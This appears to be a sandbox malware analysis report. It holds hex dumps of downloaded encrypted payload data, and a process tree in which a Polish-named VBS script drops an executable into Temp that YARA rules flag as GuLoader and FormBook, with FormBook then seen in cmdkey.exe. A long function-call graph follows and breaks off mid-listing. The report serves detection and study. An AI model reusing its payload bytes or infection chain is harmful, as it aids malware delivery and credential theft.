                              2024-09-25 15:20:28 UTC14994INData Raw: 69 d6 cc b1 77 33 c9 e9 53 d2 7d 0b 46 27 b7 0c 0c 98 63 71 4d 5d e4 f3 35 29 96 50 ea 72 1f 0e ce fc f1 cf f2 82 5c 19 cf 1f ac d6 e8 d3 10 29 54 99 db 15 7c 70 d3 61 e8 e0 17 b2 70 ca 51 d6 58 4a a0 49 bd 2b 1a db 96 04 3f b6 af ff ba 6b 11 20 64 98 39 ee cd d1 39 06 d2 9f cf 97 d7 ab 00 f4 9c da 85 e5 4d 33 97 41 19 c0 ec a6 12 d5 c7 5d 67 a4 1f c4 16 84 65 bb aa ec ce 20 a2 f9 cd 0a 84 7f 98 d2 33 da 27 57 04 42 c8 13 57 7f 13 8a ca b6 23 2e df 08 91 ed ee 62 43 07 7d 68 aa 51 27 3d 96 40 cd 34 21 4f 23 b8 3d 8d 83 58 f4 f5 da 94 e1 bf 8c fe 5c 6b a4 2c b9 a3 cc 0f c0 36 be 2b 36 42 5b 36 10 56 c3 4e 0f 00 92 29 11 fe eb a7 42 e4 97 66 ac 08 2a fb bb f2 38 b8 9d 90 43 e8 d3 b7 12 a6 09 46 d7 18 bf 23 92 79 db 07 33 d3 7f 62 b0 b3 43 8e 5e 3e 7b be fb
                              Data Ascii: iw3S}F'cqM]5)Pr\)T|papQXJI+?k d99M3A]ge 3'WBW#.bC}hQ'=@4!O#=X\k,6+6B[6VN)Bf*8CF#y3bC^>{
                              2024-09-25 15:20:28 UTC16384INData Raw: 98 07 be f1 ac 4d ca 88 3b 29 86 a9 39 8c 45 7a ac c2 6f 4e e1 71 1f 2a 01 33 67 32 e8 80 94 10 d5 dd 1f ea 20 00 a1 b6 57 24 e1 e4 ad 60 bc e3 03 40 d6 bf 97 7a 18 94 1d f2 6f 5f c5 bb bb 3d bd 18 ab 5c 98 8f 2f 2f ef fa 9f fe ff b6 53 9e a9 40 d0 76 f2 4e be 8c 50 f0 45 b8 05 a5 61 2c 11 f7 89 53 de 59 ad fe 0e 58 c9 a0 61 15 cf 89 d5 30 c4 94 b8 94 fa a1 08 7e e5 9a 3f 6b 84 66 2e a4 41 67 44 34 ca 40 63 13 8b f7 a7 fa f1 84 00 c9 fd 03 5f 16 56 98 b7 13 7f 11 21 ee cb 63 08 c7 a4 a5 db 7c 20 eb 62 db b8 01 4b bd 1a 0d 7a ea 92 a7 d2 07 ad e1 c1 b9 cd 65 06 73 69 d9 e0 37 06 d1 6f 72 98 24 2b 9e 16 81 31 d7 46 8a f3 69 ac 34 2b f6 75 6c 39 44 54 10 59 70 0c 5e 3b 75 81 1a 8e 9e a3 37 30 be 94 f5 5e 57 7a 25 fe ce 13 3a 4f bd 1c b1 fc 22 e7 e7 f1 55 83
                              Data Ascii: M;)9EzoNq*3g2 W$`@zo_=\//S@vNPEa,SYXa0~?kf.AgD4@c_V!c| bKzesi7or$+1Fi4+ul9DTYp^;u70^Wz%:O"U
                              2024-09-25 15:20:28 UTC16384INData Raw: 3f 7d 41 f5 95 0b aa 3f 10 19 a2 9e 7e 6f 69 cf 71 e1 b7 0e 22 56 d8 1c 5d 8d 87 11 ed f1 d3 9f ea 91 46 6c d5 06 9d 9d 2b a2 61 e9 c4 2e a6 01 0d 6c 07 7c 7b 73 ad 7b ec 8b af e2 8e 49 d7 d9 10 05 5e b7 0f 16 03 11 01 ef 0e 28 ae d7 69 b2 3d 71 36 42 6b a8 cd 13 44 78 6e d8 e9 56 cc b7 7d b1 6a 3f 2d 39 48 49 5f f7 4f e9 27 37 9b 8b dc 39 a3 71 dc 2e 52 d2 c5 dd 9e 37 a3 2f d7 27 57 ce 77 34 a2 94 d0 41 5a 30 71 99 8e e7 83 15 79 9f 7d 8c 1e 46 e1 45 b2 d1 ef 99 12 d5 e7 54 a3 c6 3c 33 31 a6 96 97 0b 81 86 3e 46 3b e1 b9 fb 01 da 37 9e 57 24 09 81 a6 aa cb 06 33 ce 84 f2 d5 bd b4 a2 bd 34 17 4f 81 aa 0e a0 2c cd a0 36 29 78 57 08 4e 2f b9 f4 88 e7 58 e7 12 52 d8 4a 08 26 b4 2a 57 e1 74 99 76 98 c2 3f 5a bf 16 19 1e 89 28 80 45 bd 7d f3 af 0d 72 f1 a1 03
                              Data Ascii: ?}A?~oiq"V]Fl+a.l|{s{I^(i=q6BkDxnV}j?-9HI_O'79q.R7/'Ww4AZ0qy}FET<31>F;7W$34O,6)xWN/XRJ&*Wtv?Z(E}r
                              2024-09-25 15:20:28 UTC16384INData Raw: dc a5 0b 39 17 26 9d 1a 12 a8 db 2b e0 5f db 90 de 0f 30 13 6f 54 56 3d 0b 70 cc d9 11 47 d9 73 71 70 48 66 a9 f1 8f 0d 20 11 e5 52 44 a6 a4 db 7c ee e5 4a b9 53 14 42 32 7f d1 46 43 a6 93 bf 28 91 ff 8a 96 52 ee a4 a3 5d 45 00 59 41 18 d2 9a 34 50 6e 89 7e a9 0c 90 c6 b7 5b d0 34 49 26 60 52 82 5e d7 c7 10 19 4b c9 49 c3 21 76 6e 3f 76 1b 37 e6 3c 9d 9b 68 03 d0 81 04 56 b0 a9 1e aa 4b 2b 8b ac 1b 16 54 ef e9 cf cd 34 1f 12 2a ca 77 39 dc 4a fb ff 75 dd 22 42 da 84 1b 32 e6 7c a6 e9 c1 47 8e e9 6b 64 46 eb 51 c7 35 41 18 91 4e 16 ea 26 2c 39 b5 af 2b b9 c0 18 4f a7 b8 5d 6c ca a2 35 84 8e 98 9a 06 cb 10 98 40 a2 e0 21 cd d2 85 2f 26 56 e7 9d d9 1e 9c 42 e9 dd 57 22 b8 a9 66 1d 96 5c 38 51 5a 92 5a 02 c8 8f 38 e1 ef f8 08 c6 a8 3d 8b f2 d1 6e 65 d0 85 03
                              Data Ascii: 9&+_0oTV=pGsqpHf RD|JSB2FC(R]EYA4Pn~[4I&`R^KI!vn?v7<hVK+T4*w9Ju"B2|GkdFQ5AN&,9+O]l5@!/&VBW"f\8QZZ8=ne
                              2024-09-25 15:20:28 UTC16384INData Raw: 88 5b cd d6 a9 13 05 33 5c 0f ba 92 a3 7a 56 7b 7b 55 fd f5 c3 ae a9 8e 15 46 53 90 fc c5 f2 1c 05 2f 54 28 e6 0b fc 68 b6 b8 ef 49 56 ea 1b 2d 1f 88 d7 51 d6 39 a3 15 d5 9d 84 e0 de 1e 31 fc e0 1a cd 20 1a 38 57 bb c2 40 ea 80 98 18 92 ec 8d 89 19 38 07 4c 4d b8 fa b8 9c 01 bb f8 07 f4 d9 43 85 4c 3d 6f ef 22 5a 1d e2 f9 ab d7 fd 48 bb de 4d b3 d1 03 ea 10 b0 31 f4 dd 44 a2 da 82 13 6f 21 ec f4 63 38 1a a0 11 78 9f a4 e0 8a 92 41 c6 74 0b fd e2 e7 6d f4 9c 1c 4b 50 29 8f 37 c1 51 98 2f 31 01 53 6e 1e 3e c8 00 d1 e8 8e c7 fb e7 8b e5 1f 55 1b dc 38 fa 54 27 13 55 f6 19 fe d6 d1 3e 6f cd fc 38 37 52 99 f1 43 70 10 76 55 53 84 d3 18 c4 85 95 e5 9f 6b 0a a1 91 67 27 f8 3e 71 81 3f ec b9 2e f0 a3 20 64 ff 55 30 ad 6c 19 84 b6 27 a7 71 29 67 87 cb 3c d1 1b ef
                              Data Ascii: [3\zV{{UFS/T(hIV-Q91 8W@8LMCL=o"ZHM1Do!c8xAtmKP)7Q/1Sn>U8T'U>o87RCpvUSkg'>q?. dU0l'q)g<
                              2024-09-25 15:20:28 UTC16384INData Raw: 55 04 14 ec e2 3b 10 19 cc 51 2f 50 a1 db 44 bb f0 66 b0 4a 2e 24 d4 ac 81 25 c0 a7 e7 e1 05 05 56 91 c5 67 64 7a 57 db fa d4 ac 89 42 e0 f7 31 26 38 81 ad 8d 99 67 de d2 6e ed 5f 80 6b 1e 76 2b 83 fb e3 9b 3a f3 c6 8d a1 cb db cb bb 49 01 be a7 5f 35 62 b7 19 e3 54 83 26 36 83 b8 1a 41 19 a0 41 00 57 6a ab 70 1c 1f 08 5c 26 c7 18 62 c8 3d 81 e4 56 8d 42 77 91 61 b0 c0 ce bb 21 1a 87 91 e0 75 f0 bb 8f 65 81 ee 54 16 be bc 5f d9 6c d2 6b 43 ca 84 6c 84 54 50 8a 42 eb e0 92 17 38 18 31 02 95 5d 09 f8 25 18 6e e8 4d 87 20 68 a5 52 6f f7 d5 d5 72 0d 83 50 f8 0d 0d 79 e4 de 3e f1 db 24 9e 3a 1c df 89 b4 96 89 9a f5 93 8f 23 0a c7 f8 2e 63 06 b0 c8 d8 27 f9 85 e0 e5 4e 52 9a 29 01 df 98 21 00 de b8 b1 95 25 8f 70 fd 2e b7 ed c5 06 60 11 93 dc cf 76 91 42 89 b3
                              Data Ascii: U;Q/PDfJ.$%VgdzWB1&8gn_kv+:I_5bT&6AAWjp\&b=VBwa!ueT_lkClTPB81]%nM hRorPy>$:#.c'NR)!%p.`vB
                              2024-09-25 15:20:28 UTC16384INData Raw: 56 86 2b a9 88 90 96 0c 17 9b f8 dc 03 e1 e3 87 44 17 38 5c 45 71 23 18 66 4e 15 1e 79 3b 0a 87 5f 0e fe 46 ed 11 35 46 f0 7f b2 2e fa ac a1 41 03 d7 64 36 3c f3 6b a3 70 13 b6 7f 3f dd 5e fe 54 de c2 4c 2f cc 26 47 02 85 0b 17 a8 a0 c2 32 31 04 9c 60 1c fd b3 df 56 16 cf 69 d5 53 d1 38 62 b5 d7 e8 a4 a1 15 d3 61 ce cd 45 97 3b 46 e2 64 30 5b 7c f4 3d 9c 7f 3c 43 80 f4 fa ff 2b 1b 53 bd 2f d5 69 fa c3 98 98 db da d3 68 08 db 7a 17 64 cd 94 4a 31 31 48 91 ee 52 97 4f 93 52 40 56 fe 7e de 9a 61 85 69 eb c2 a8 94 f5 d9 5e e3 40 fe 45 45 84 0a 13 b6 db 26 26 06 75 e2 f2 c7 f3 4d 5c 51 fb a7 23 27 b4 a7 11 d4 1f fd f6 73 dc 73 0d 6c af a2 06 4f 28 9a 65 77 73 90 48 34 d0 bd ab be d2 e9 a7 84 8c e2 b3 73 6b b8 c5 b5 b1 b3 1d 54 28 b2 7a a3 fb d3 6c ef 14 ae 93
                              Data Ascii: V+D8\Eq#fNy;_F5F.Ad6<kp?^TL/&G21`ViS8baE;Fd0[|=<C+S/ihzdJ11HROR@V~ai^@EE&&uM\Q#'sslO(ewsH4skT(zl
                              2024-09-25 15:20:28 UTC16384INData Raw: b2 63 23 dc c4 73 b9 c0 9f d6 9e 87 0b 96 80 b0 07 5c 86 2f 80 00 ff bc 86 3e 1c 38 98 09 11 c5 30 74 2c f7 7a 1c 7e 09 07 b3 d6 c9 8f 08 f6 37 62 8b 7b b4 13 58 82 38 02 4c 80 b1 e9 94 82 da 1b 59 9a 62 d7 af 60 71 41 82 e9 29 7a c8 bf cd 00 a9 4b c6 00 e4 4d 2c 86 98 78 70 f2 7b 8a 27 a1 86 90 f8 b5 dc e1 0e 8d 3a 88 03 9f 86 8e 75 1a 30 10 49 c0 1c 70 6c 9c 6e b0 e0 e9 1c 31 19 15 6c 96 c1 e0 f8 7c 71 85 79 87 85 ed 17 e8 7a 42 36 04 08 8e 32 65 fb 81 81 9c ac b5 3d 02 96 6f 0e 36 cf fe b9 9e 35 9a 0f 81 87 25 8e 85 69 78 dd 24 2f 2c 79 af 81 12 0f 55 d0 97 1b 95 67 00 c5 de 12 8e 3e 18 89 10 5e 6a 32 38 cc 3d ba eb d3 19 f5 ea 38 66 1e ac dc 2f e0 87 34 07 81 b2 0c e3 2a b3 ff 71 bd 77 81 ba 7c 46 19 d3 26 e7 e6 86 5d 88 c8 c1 64 a1 41 42 9f 79 d6 e4
                              Data Ascii: c#s\/>80t,z~7b{X8LYb`qA)zKM,xp{':u0Ipln1l|qyzB62e=o65%ix$/,yUg>^j28=8f/4*qw|F&]dABy
                              2024-09-25 15:20:28 UTC426INData Raw: 73 ef 9b 4d cf d6 9f cb 6e 92 45 3e cd b2 56 13 79 e5 45 63 6a 3d 5d 99 0e 08 6a f5 bd 50 a1 ec 87 8f 78 9f 92 eb 83 c8 96 d3 94 39 8a 11 38 db 47 b2 5b 30 f3 5f 23 52 2c cc ec 2b 75 5d 06 90 d7 0a 5e df b8 27 0c be c6 a3 ca dd 42 48 f1 11 42 99 86 b2 9b 72 c6 9b 72 2e 5a 71 e4 e4 7a 57 ab d2 fb 6f 8a 0d 26 6b e2 0b 18 b6 8d df d1 ee e2 4c 0e a4 09 6c 96 31 c3 53 08 8b 7c 8c d8 44 d0 ec cb 29 26 ce fb f2 1e e2 1b 6c de 04 47 e9 d3 3c c6 a0 bd 90 e4 46 f1 7b e5 2e ce 5a 30 77 37 8b 65 16 77 71 04 c8 b7 aa f0 35 72 dc 72 4b 65 82 a2 ce 68 18 56 30 71 df 9b fd ae db 9f 35 a9 c9 13 d2 03 38 f7 6a 4c 23 a3 62 6e 9d b2 4b 58 a4 5d 30 00 47 ae df b5 13 99 99 dc 4e f2 29 03 d5 44 b2 b4 d8 01 f0 88 3f 32 16 02 f0 c4 6d 85 2e e3 6d 3d 22 ae 93 08 cb 29 58 cb ef 99
                              Data Ascii: sMnE>VyEcj=]jPx98G[0_#R,+u]^'BHBrr.ZqzWo&kLl1S|D)&lG<F{.Z0w7ewq5rrKehV0q58jL#bnKX]0GN)D?2m.m=")X


                              Target ID:0
                              Start time:11:19:57
                              Start date:25/09/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zeskanowana lista przedmiot#U00f3w nr 84329.vbs"
                              Imagebase:0x7ff6cc890000
                              File size:170'496 bytes
                              MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:11:20:04
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                              Imagebase:0x400000
                              File size:830'512 bytes
                              MD5 hash:C9B895E1253AA2B7147BE9B1E43F2DBD
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.19989077508.00000000032B6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 8%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:11:20:22
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                              Imagebase:0x400000
                              File size:830'512 bytes
                              MD5 hash:C9B895E1253AA2B7147BE9B1E43F2DBD
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.20223233654.0000000032A60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.20209174867.0000000001876000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:11:20:42
                              Start date:25/09/2024
                              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                              Imagebase:0x140000000
                              File size:16'696'840 bytes
                              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              Target ID:5
                              Start time:11:20:42
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\cmdkey.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                              Imagebase:0xc00000
                              File size:17'408 bytes
                              MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21763322977.0000000003450000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.21763571664.0000000003620000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:moderate
                              Has exited:true

                              Target ID:6
                              Start time:11:23:17
                              Start date:25/09/2024
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff7becb0000
                              File size:4'849'904 bytes
                              MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                                Execution Graph

                                Execution Coverage:18.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:18.8%
                                Total number of Nodes:1562
                                Total number of Limit Nodes:49
                                execution_graph: node and edge listing of the interactive execution graph (numbered nodes keyed by function address, each annotated with the API calls reached from it, e.g. wsprintfW, SHFileOperationW, FindNextFileW, VirtualProtect, RegSetValueExW, CreateProcessW, ExitWindowsEx, ShellExecuteExW). It is rendered as a graph on the original page and is not reproduced as text here.
5084->5089 5086 40303e 17 API calls 5085->5086 5087 401aa7 5086->5087 5088 4066f4 66 API calls 5087->5088 5088->5089 5090 40216c 5091 40303e 17 API calls 5090->5091 5092 402173 5091->5092 5093 4065aa 2 API calls 5092->5093 5094 402179 5093->5094 5096 402188 5094->5096 5097 4065fa wsprintfW 5094->5097 5097->5096 5098 404f6d 5099 404f8c 5098->5099 5100 40510e 5098->5100 5099->5100 5101 404f98 5099->5101 5102 405122 GetDlgItem GetDlgItem 5100->5102 5107 40515b 5100->5107 5104 404fb7 5101->5104 5105 404f9d SetWindowPos 5101->5105 5106 4054f5 18 API calls 5102->5106 5103 4051b2 5108 4054c3 SendMessageW 5103->5108 5113 405109 5103->5113 5109 40500a 5104->5109 5110 404fbc ShowWindow 5104->5110 5114 4050df 5105->5114 5111 405145 SetClassLongW 5106->5111 5107->5103 5112 401399 94 API calls 5107->5112 5137 4051c4 5108->5137 5116 405012 DestroyWindow 5109->5116 5117 40502c 5109->5117 5110->5114 5115 404fe1 GetWindowLongW 5110->5115 5118 401533 94 API calls 5111->5118 5119 40518b 5112->5119 5120 405736 8 API calls 5114->5120 5115->5114 5121 404ffd ShowWindow 5115->5121 5122 405443 5116->5122 5123 405031 SetWindowLongW 5117->5123 5124 405044 5117->5124 5118->5107 5119->5103 5126 40518f SendMessageW 5119->5126 5120->5113 5121->5114 5122->5113 5131 405476 ShowWindow 5122->5131 5123->5113 5124->5114 5125 405050 GetDlgItem 5124->5125 5129 40506c SendMessageW IsWindowEnabled 5125->5129 5130 40508b 5125->5130 5126->5113 5127 401533 94 API calls 5127->5137 5128 405445 DestroyWindow EndDialog 5128->5122 5129->5113 5129->5130 5133 40509e 5130->5133 5135 4050e1 SendMessageW 5130->5135 5136 4050b0 5130->5136 5143 405096 5130->5143 5131->5113 5132 405e95 17 API calls 5132->5137 5133->5135 5133->5143 5135->5114 5138 4050c7 5136->5138 5139 4050b9 5136->5139 5137->5113 5137->5127 5137->5128 5137->5132 5140 4054f5 18 API calls 5137->5140 5144 4054f5 18 API calls 5137->5144 5157 405385 DestroyWindow 5137->5157 5142 401533 94 API calls 5138->5142 5141 401533 94 API calls 5139->5141 5140->5137 
5141->5143 5142->5143 5143->5114 5166 405933 5143->5166 5145 405248 GetDlgItem 5144->5145 5146 40526f ShowWindow EnableWindow EnableWindow EnableWindow 5145->5146 5150 405263 5145->5150 5146->5150 5147 4052c4 GetSystemMenu EnableMenuItem SendMessageW 5148 4052f1 SendMessageW 5147->5148 5147->5150 5148->5150 5150->5146 5150->5147 5151 405cf6 18 API calls 5150->5151 5169 4054de SendMessageW 5150->5169 5170 406af5 lstrcpynW 5150->5170 5151->5150 5153 405323 lstrlenW 5154 405e95 17 API calls 5153->5154 5155 40533d SetWindowTextW 5154->5155 5156 401399 94 API calls 5155->5156 5156->5137 5157->5122 5158 40539f CreateDialogParamW 5157->5158 5158->5122 5159 4053d2 5158->5159 5160 4054f5 18 API calls 5159->5160 5161 4053dd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5160->5161 5162 401399 94 API calls 5161->5162 5163 405423 5162->5163 5163->5113 5164 40542b ShowWindow 5163->5164 5165 4054c3 SendMessageW 5164->5165 5165->5122 5167 405940 SendMessageW 5166->5167 5168 40593a 5166->5168 5167->5114 5168->5167 5169->5150 5170->5153 5171 401af0 5172 40303e 17 API calls 5171->5172 5173 401af7 lstrlenW 5172->5173 5175 401afd 5173->5175 5174 40303e 17 API calls 5174->5175 5175->5174 5177 402855 5175->5177 5178 4068f6 GetFileAttributesW CreateFileW 5175->5178 5178->5175 3922 402af5 3923 402afc 3922->3923 3934 401709 3922->3934 3924 403002 17 API calls 3923->3924 3925 402b03 3924->3925 3926 402b10 SetFilePointer 3925->3926 3928 402b21 3926->3928 3926->3934 3927 403002 17 API calls 3927->3928 3928->3927 3929 402d10 3928->3929 3928->3934 3930 402d35 3929->3930 3931 402d25 3929->3931 3933 405e95 17 API calls 3930->3933 3932 403002 17 API calls 3931->3932 3932->3934 3933->3934 5179 402b75 5180 40303e 17 API calls 5179->5180 5181 402b7c FindFirstFileW 5180->5181 5182 402b90 5181->5182 5185 4065fa wsprintfW 5182->5185 5184 402b67 5185->5184 5186 402077 5187 40303e 17 API calls 5186->5187 5188 40207d 5187->5188 5189 40303e 17 API calls 5188->5189 5190 402086 5189->5190 5191 40303e 17 
API calls 5190->5191 5192 40208f 5191->5192 5193 40303e 17 API calls 5192->5193 5194 402098 5193->5194 5195 405d15 24 API calls 5194->5195 5196 4020a4 5195->5196 5203 4069ce ShellExecuteExW 5196->5203 5198 4020ea 5199 4064ef 5 API calls 5198->5199 5200 401709 5198->5200 5201 402109 CloseHandle 5199->5201 5201->5200 5203->5198 4534 6fc3167a 4535 6fc316b7 4534->4535 4576 6fc32351 4535->4576 4537 6fc316be 4538 6fc317ef 4537->4538 4539 6fc316d6 4537->4539 4540 6fc316cf 4537->4540 4606 6fc32049 4539->4606 4622 6fc31fcb 4540->4622 4545 6fc31722 4635 6fc32209 4545->4635 4546 6fc31740 4549 6fc31791 4546->4549 4550 6fc31746 4546->4550 4547 6fc316eb 4552 6fc316f5 4547->4552 4557 6fc31702 4547->4557 4548 6fc3170a 4563 6fc31700 4548->4563 4632 6fc32f9f 4548->4632 4555 6fc32209 10 API calls 4549->4555 4654 6fc31f1e 4550->4654 4552->4563 4616 6fc32d14 4552->4616 4561 6fc3177e 4555->4561 4556 6fc31728 4646 6fc31668 4556->4646 4626 6fc317f7 4557->4626 4567 6fc317de 4561->4567 4659 6fc3200d 4561->4659 4563->4545 4563->4546 4564 6fc31708 4564->4563 4565 6fc32209 10 API calls 4565->4561 4567->4538 4569 6fc317e8 GlobalFree 4567->4569 4569->4538 4573 6fc317cf 4573->4567 4663 6fc315c5 wsprintfW 4573->4663 4575 6fc317c2 FreeLibrary 4575->4573 4666 6fc312f8 GlobalAlloc 4576->4666 4578 6fc3237f 4667 6fc312f8 GlobalAlloc 4578->4667 4580 6fc32a3a GlobalFree GlobalFree GlobalFree 4581 6fc32a5a 4580->4581 4597 6fc32aa7 4580->4597 4582 6fc32af7 4581->4582 4587 6fc32a73 4581->4587 4581->4597 4584 6fc32b19 GetModuleHandleW 4582->4584 4582->4597 4583 6fc32947 GlobalAlloc 4601 6fc3238a 4583->4601 4585 6fc32b2a LoadLibraryW 4584->4585 4586 6fc32b3f 4584->4586 4585->4586 4585->4597 4674 6fc31f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4586->4674 4593 6fc312e1 2 API calls 4587->4593 4587->4597 4589 6fc3299f lstrcpyW 4589->4601 4590 6fc329bd GlobalFree 4590->4601 4591 6fc32b8e 4592 6fc32b9c lstrlenW 4591->4592 4591->4597 4675 6fc31f7b WideCharToMultiByte 
GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4592->4675 4593->4597 4594 6fc329af lstrcpyW 4594->4601 4595 6fc32b4c 4595->4591 4603 6fc32b78 GetProcAddress 4595->4603 4597->4537 4598 6fc32bb6 4598->4597 4600 6fc32822 GlobalFree 4600->4601 4601->4580 4601->4583 4601->4589 4601->4590 4601->4594 4601->4600 4605 6fc329fb 4601->4605 4668 6fc312f8 GlobalAlloc 4601->4668 4669 6fc312e1 4601->4669 4603->4591 4605->4601 4672 6fc31309 GlobalSize GlobalAlloc 4605->4672 4608 6fc3205e 4606->4608 4607 6fc312e1 lstrcpynW GlobalAlloc 4607->4608 4608->4607 4610 6fc32124 GlobalAlloc WideCharToMultiByte 4608->4610 4611 6fc32154 GlobalAlloc CLSIDFromString 4608->4611 4612 6fc321be GlobalFree 4608->4612 4615 6fc32179 4608->4615 4677 6fc31548 4608->4677 4610->4612 4611->4608 4612->4608 4613 6fc316dc 4612->4613 4613->4547 4613->4548 4613->4563 4615->4612 4682 6fc319db 4615->4682 4618 6fc32d26 4616->4618 4617 6fc32dcb VirtualAllocEx 4621 6fc32de9 4617->4621 4618->4617 4685 6fc32cbf 4621->4685 4623 6fc31fde 4622->4623 4624 6fc316d5 4623->4624 4625 6fc31fe9 GlobalAlloc 4623->4625 4624->4539 4625->4623 4630 6fc31823 4626->4630 4627 6fc31897 GlobalAlloc 4631 6fc318b5 4627->4631 4628 6fc318a8 4629 6fc318ac GlobalSize 4628->4629 4628->4631 4629->4631 4630->4627 4630->4628 4631->4564 4633 6fc32faa 4632->4633 4634 6fc32fea GlobalFree 4633->4634 4688 6fc312f8 GlobalAlloc 4635->4688 4637 6fc32280 MultiByteToWideChar 4642 6fc32211 4637->4642 4638 6fc322b7 lstrcpynW 4638->4642 4639 6fc322a6 StringFromGUID2 4639->4642 4640 6fc322ca wsprintfW 4640->4642 4641 6fc322ee GlobalFree 4641->4642 4642->4637 4642->4638 4642->4639 4642->4640 4642->4641 4643 6fc32325 GlobalFree 4642->4643 4644 6fc315eb 2 API calls 4642->4644 4689 6fc31638 4642->4689 4643->4556 4644->4642 4693 6fc312f8 GlobalAlloc 4646->4693 4648 6fc3166d 4649 6fc31f1e 2 API calls 4648->4649 4650 6fc31677 4649->4650 4651 6fc315eb 4650->4651 4652 6fc31633 GlobalFree 4651->4652 4653 6fc315f4 GlobalAlloc lstrcpynW 4651->4653 4652->4561 
4653->4652 4655 6fc31f2b wsprintfW 4654->4655 4656 6fc31f5c lstrcpyW 4654->4656 4658 6fc31765 4655->4658 4656->4658 4658->4565 4660 6fc317a4 4659->4660 4661 6fc3201c 4659->4661 4660->4573 4660->4575 4661->4660 4662 6fc32033 GlobalFree 4661->4662 4662->4661 4664 6fc315eb 2 API calls 4663->4664 4665 6fc315e6 4664->4665 4665->4567 4666->4578 4667->4601 4668->4601 4676 6fc312f8 GlobalAlloc 4669->4676 4671 6fc312f0 lstrcpynW 4671->4601 4673 6fc31327 4672->4673 4673->4605 4674->4595 4675->4598 4676->4671 4678 6fc31555 4677->4678 4679 6fc312f8 GlobalAlloc 4677->4679 4680 6fc312e1 2 API calls 4678->4680 4679->4608 4681 6fc3156a 4680->4681 4681->4608 4683 6fc319ea VirtualAlloc 4682->4683 4684 6fc31a48 4682->4684 4683->4684 4684->4615 4686 6fc32cd8 4685->4686 4687 6fc32ccd GetLastError 4685->4687 4686->4563 4687->4686 4688->4642 4690 6fc31663 4689->4690 4691 6fc3163f 4689->4691 4690->4642 4691->4690 4692 6fc31648 lstrcpyW 4691->4692 4692->4690 4693->4648 5204 4043f9 GetDlgItem GetDlgItem 5205 40444d 7 API calls 5204->5205 5210 404673 5204->5210 5206 4044f0 DeleteObject 5205->5206 5207 4044e3 SendMessageW 5205->5207 5209 4044ff 5206->5209 5207->5206 5208 4047aa 5211 404884 5208->5211 5212 4047ef 5208->5212 5216 405e95 17 API calls 5209->5216 5217 40453d 5209->5217 5210->5208 5236 404705 5210->5236 5258 4056b5 SendMessageW 5210->5258 5214 404893 SendMessageW 5211->5214 5215 4048af 5211->5215 5213 4048d9 5212->5213 5219 40480e SendMessageW 5212->5219 5221 405736 8 API calls 5213->5221 5214->5213 5222 4048b9 5215->5222 5234 4048ef 5215->5234 5224 404515 SendMessageW SendMessageW 5216->5224 5218 4054f5 18 API calls 5217->5218 5225 404555 5218->5225 5219->5213 5227 40482b SendMessageW 5219->5227 5220 404792 SendMessageW 5220->5208 5228 404b01 5221->5228 5229 4048c2 ImageList_Destroy 5222->5229 5230 4048c9 5222->5230 5224->5209 5231 4054f5 18 API calls 5225->5231 5226 404ab8 5226->5213 5235 404acf ShowWindow GetDlgItem ShowWindow 5226->5235 5232 404844 